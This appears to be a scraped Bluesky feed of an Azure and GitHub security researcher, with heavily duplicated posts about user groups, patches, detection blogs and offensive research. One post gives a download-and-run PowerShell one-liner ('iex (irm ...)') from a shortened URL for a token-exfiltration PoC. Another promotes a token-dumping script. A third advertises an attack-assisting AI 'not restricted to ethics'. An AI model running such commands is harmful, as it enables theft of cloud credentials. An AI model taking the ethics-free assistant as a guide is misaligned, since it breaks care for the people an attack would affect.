Rogier Dijkman | MVP
@rogierdijkman.bsky.social
🔐 Security Researcher | Marathon Runner | Author | IaC | #GitHub | #PowerShell | #Azure #Bicep | #Copilot
Pinned
🚨 ANNOUNCEMENT🚨
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere.
I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.
I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.
August 2, 2025 at 11:41 AM
Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere.
I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.
I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.
That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it.
If you never look away, you will only see what happens in front of you.
If you never look away, you will only see what happens in front of you.
March 16, 2025 at 2:59 PM
That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it.
If you never look away, you will only see what happens in front of you.
If you never look away, you will only see what happens in front of you.
Operating the camera 📷 at the #YellowHat event at @Microsoft
March 6, 2025 at 3:22 PM
Operating the camera 📷 at the #YellowHat event at @Microsoft
Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com
WhiteRabbitNeo - Your cybersecurity co-pilot
WhiteRabbitNeo is an AI company focused on cybersecurity.
app.whiterabbitneo.com
February 19, 2025 at 4:45 PM
Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com
🚨AzTokenDumpr 🚨
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)
February 12, 2025 at 7:22 PM
🚨AzTokenDumpr 🚨
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)
In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.
Self-Service Membership for GitHub Organizations
In this article, we will walk through a solution to automate the process of adding new members to a GitHub organization
rogierdijkman.medium.com
February 4, 2025 at 4:47 PM
In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.
The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security
flatt.tech/research/pos...
flatt.tech/research/pos...
Clone2Leak: Your Git Credentials Belong To Us
Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at GMO Flatt Security Inc.
In October 2024, I was hunting bugs for the GitHub Bug Bounty program. After investigating GitHub Enterprise...
flatt.tech
January 30, 2025 at 6:17 AM
The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security
flatt.tech/research/pos...
flatt.tech/research/pos...
In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources.
rogierdijkman.medium.com/self-hosted-...
rogierdijkman.medium.com/self-hosted-...
Self-hosted password solution in Azure
In this article, I’m excited to introduce a project I’ve been working on to securely share secrets using only Azure resources.
rogierdijkman.medium.com
January 28, 2025 at 9:09 AM
In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources.
rogierdijkman.medium.com/self-hosted-...
rogierdijkman.medium.com/self-hosted-...
🚨 ANNOUNCEMENT🚨
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
January 24, 2025 at 3:35 PM
🚨 ANNOUNCEMENT🚨
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
🚨 New Blog Alert! 🚨
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.
Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.
Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
Detecting ‘fasthttp’ bruteforce attacks on Entra ID
In this blog post, I will explain how to detect brute force attacks using Kusto Query Language (KQL) in Microsoft Defender. I will provide…
rogierdijkman.medium.com
January 15, 2025 at 11:46 AM
🚨 New Blog Alert! 🚨
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.
Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.
Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
www.speartip.com/fasthttp-use...
**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
fasthttp Used in New Bruteforce Campaign
SpearTip Security Operations Center, together with the SaaS Alerts team, identified an emerging threat involving the fastHTTP library
www.speartip.com
January 15, 2025 at 6:31 AM
www.speartip.com/fasthttp-use...
**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
🚨 **Patch Alert!** 🚨 Microsoft’s January 2025 Patch Tuesday is here, and it’s packed with security updates! 🛡️
👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate
Ready to dive into the details? 💻🔧🔍
👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate
Ready to dive into the details? 💻🔧🔍
Microsoft January 2025 Patch Tuesday Fixes 159 Flaws with 8 Zero-days
Windows 11 with KB5050009, KB5050021 and Windows 10 with KB5049981, KB5050008, KB5049993, KB5050013
www.cyberkendra.com
January 14, 2025 at 7:42 PM
🚨 **Patch Alert!** 🚨 Microsoft’s January 2025 Patch Tuesday is here, and it’s packed with security updates! 🛡️
👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate
Ready to dive into the details? 💻🔧🔍
👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate
Ready to dive into the details? 💻🔧🔍
Having fun with Microsoft Azure
Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault
Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault
January 8, 2025 at 7:48 PM
Having fun with Microsoft Azure
Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault
Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault
I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes.
github.com/azurekid/bla...
github.com/azurekid/bla...
blackcat/src/Public/generic/Export-AccessTokens.ps1 at main · azurekid/blackcat
Contribute to azurekid/blackcat development by creating an account on GitHub.
github.com
January 6, 2025 at 10:04 PM
I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes.
github.com/azurekid/bla...
github.com/azurekid/bla...
December 18, 2024 at 9:37 PM
Kali Linux 2024.4 released with 14 new tools, deprecates some features
www.kali.org/blog/kali-li...
#Security
www.kali.org/blog/kali-li...
#Security
Kali Linux 2024.4 Release (Python 3.12, Goodbye i386, Raspberry Pi Imager & Kali NetHunter) | Kali Linux Blog
Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate download, or u...
www.kali.org
December 17, 2024 at 3:51 AM
Kali Linux 2024.4 released with 14 new tools, deprecates some features
www.kali.org/blog/kali-li...
#Security
www.kali.org/blog/kali-li...
#Security
Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour
www.oasis.security/resources/bl...
#Microsoft #Security #MFA
Oasis Security Research Team Discovers Microsoft Azure MFA Bypass
Critical vulnerability could have allowed malicious actors to gain unauthorized access to users’ Microsoft accounts.
www.oasis.security
December 11, 2024 at 9:18 PM
Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour
www.oasis.security/resources/bl...
#Microsoft #Security #MFA
Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake?
www.darkreading.com/application-...
www.darkreading.com/application-...
Microsoft Fixes Zero-Day, Critical RCEs in Patch Tuesday
The zero-day (CVE-2024-49138), plus a worryingly critical unauthenticated RCE security vulnerability (CVE-2024-49112), are unwanted gifts for security admins this season.
www.darkreading.com
December 11, 2024 at 1:33 PM
Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake?
www.darkreading.com/application-...
www.darkreading.com/application-...
In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?...
▶️PyRIT: github.com/Azure/PyRIT
▶️PyRIT: github.com/Azure/PyRIT
Zero Day Quest - Learn to Red Team AI Systems Using PyRIT. Recorded December 2nd 2024
YouTube video by Microsoft Security Response Center (MSRC)
youtu.be
December 3, 2024 at 6:51 AM
In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?...
▶️PyRIT: github.com/Azure/PyRIT
▶️PyRIT: github.com/Azure/PyRIT